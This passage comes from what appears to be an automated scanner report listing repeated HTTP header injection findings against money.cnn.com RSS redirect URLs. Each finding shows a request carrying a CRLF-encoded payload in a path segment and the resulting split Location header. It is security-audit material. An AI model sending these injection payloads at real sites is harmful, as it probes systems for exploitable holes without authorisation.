Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload ffef4%0d%0aa029c46ab0e was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/ffef4%0d%0aa029c46ab0e/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/ffef4
a029c46ab0e/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/ffef4
a029c
...[SNIP]...

4.31. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload c3f49%0d%0aac654ae67d3 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/c3f49%0d%0aac654ae67d3 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/credit_card_fraud_identity_theft/c3f49
ac654ae67d3
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/credit_card_
...[SNIP]...

4.32. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fcac7%0d%0a4dfd18c6daa was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/fcac7%0d%0a4dfd18c6daa/05/03/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/fcac7
4dfd18c6daa/05/03/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/fcac7
4dfd18c6daa/05/03/p
...[SNIP]...

4.33. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 50f15%0d%0a1c251ebbaa7 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/50f15%0d%0a1c251ebbaa7/03/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/50f15
1c251ebbaa7/03/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/50f15
1c251ebbaa7/03
...[SNIP]...

4.34. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 93a04%0d%0adbe11b730ea was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/93a04%0d%0adbe11b730ea/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/93a04
dbe11b730ea/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/93a04
dbe11b730ea
...[SNIP]...

4.35. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 42731%0d%0a50eb27b4a8a was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/42731%0d%0a50eb27b4a8a/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/42731
50eb27b4a8a/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/42731
50eb27b4
...[SNIP]...

4.36. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b3cce%0d%0a9574cc509ac was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/b3cce%0d%0a9574cc509ac/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/b3cce
9574cc509ac/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/b3cce
9574c
...[SNIP]...

4.37. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload a510a%0d%0a638aad50604 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/high_gas_prices_hurt/a510a%0d%0a638aad50604 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/high_gas_prices_hurt/a510a
638aad50604
Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/high_gas_pri
...[SNIP]...

4.38. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7112f%0d%0a0257b7a00de was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/7112f%0d%0a0257b7a00de/05/03/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:38 GMT
Server: Apache
Location: http://money.cnn.com/7112f
0257b7a00de/05/03/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/7112f
0257b7a00de/05/03/p
...[SNIP]...

4.39. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 73b9f%0d%0a39944a406a4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/73b9f%0d%0a39944a406a4/03/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/73b9f
39944a406a4/03/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/73b9f
39944a406a4/03
...[SNIP]...

4.40. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload cc226%0d%0a09f5b65eab6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/cc226%0d%0a09f5b65eab6/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/cc226
09f5b65eab6/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/cc226
09f5b65eab6
...[SNIP]...

4.41. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d94a7%0d%0aefdca2f4b0 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/d94a7%0d%0aefdca2f4b0/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/d94a7
efdca2f4b0/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/d94a7
efdca2f4
...[SNIP]...

4.42. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b0d38%0d%0aef7cdccc242 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/b0d38%0d%0aef7cdccc242/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/b0d38
ef7cdccc242/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/b0d38
ef7cd
...[SNIP]...

4.43. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 386d0%0d%0ac1a44c784d0 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/saving/386d0%0d%0ac1a44c784d0/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/saving/386d0
c1a44c784d0/index.htm
Vary: Accept-Encoding
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/saving/386d0
...[SNIP]...

4.44. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 944bb%0d%0a0c205831719 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/944bb%0d%0a0c205831719 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:48 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/saving/caeer_goals.moneymag/944bb
0c205831719
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/saving/caeer
...[SNIP]...

4.45. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c481b%0d%0aecc7502831d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/c481b%0d%0aecc7502831d/05/03/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/c481b
ecc7502831d/05/03/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/c481b
ecc7502831d/05/03/r
...[SNIP]...

4.46. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d41cf%0d%0a7cc224e605c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/d41cf%0d%0a7cc224e605c/03/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/d41cf
7cc224e605c/03/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 345
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/d41cf
7cc224e605c/03
...[SNIP]...

4.47. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload a6396%0d%0a54e70abbb70 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/a6396%0d%0a54e70abbb70/retirement/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/a6396
54e70abbb70/retirement/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 345
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/a6396
54e70abbb70
...[SNIP]...

4.48. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 50372%0d%0ad71e5693a3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/50372%0d%0ad71e5693a3/inheritance_headache.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/50372
d71e5693a3/inheritance_headache.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 336
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/50372
d71e5693
...[SNIP]...

4.49. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b4e20%0d%0a9e160d42c7 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/retirement/b4e20%0d%0a9e160d42c7/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/retirement/b4e20
9e160d42c7/index.htm
Vary: Accept-Encoding
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/retirement/b4e2
...[SNIP]...

4.50. http://money.cnn.com/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/03/retirement/inheritance_headache.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload e7a9b%0d%0a2e6c28b0e33 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/retirement/inheritance_headache.moneymag/e7a9b%0d%0a2e6c28b0e33 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/retirement/inheritance_headache.moneymag/e7a9b
2e6c28b0e33
Vary: Accept-Encoding
Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/retirement/inhe
...[SNIP]...

4.51. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cfaee%0d%0a97890f9f395 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/cfaee%0d%0a97890f9f395/05/04/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/cfaee
97890f9f395/05/04/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/cfaee
97890f9f395/05/04/a
...[SNIP]...

4.52. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 276a0%0d%0a4319be5c91a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/276a0%0d%0a4319be5c91a/04/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/276a0
4319be5c91a/04/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/276a0
4319be5c91a/04
...[SNIP]...

4.53. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 1a2b5%0d%0af12b48cd4a1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/1a2b5%0d%0af12b48cd4a1/autos/cruz_recall/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/1a2b5
f12b48cd4a1/autos/cruz_recall/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/1a2b5
f12b48cd4a1
...[SNIP]...

4.54. http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://money.cnn.com
Path:	/rssclick/2011/05/04/autos/cruz_recall/index.htm

Issue detail

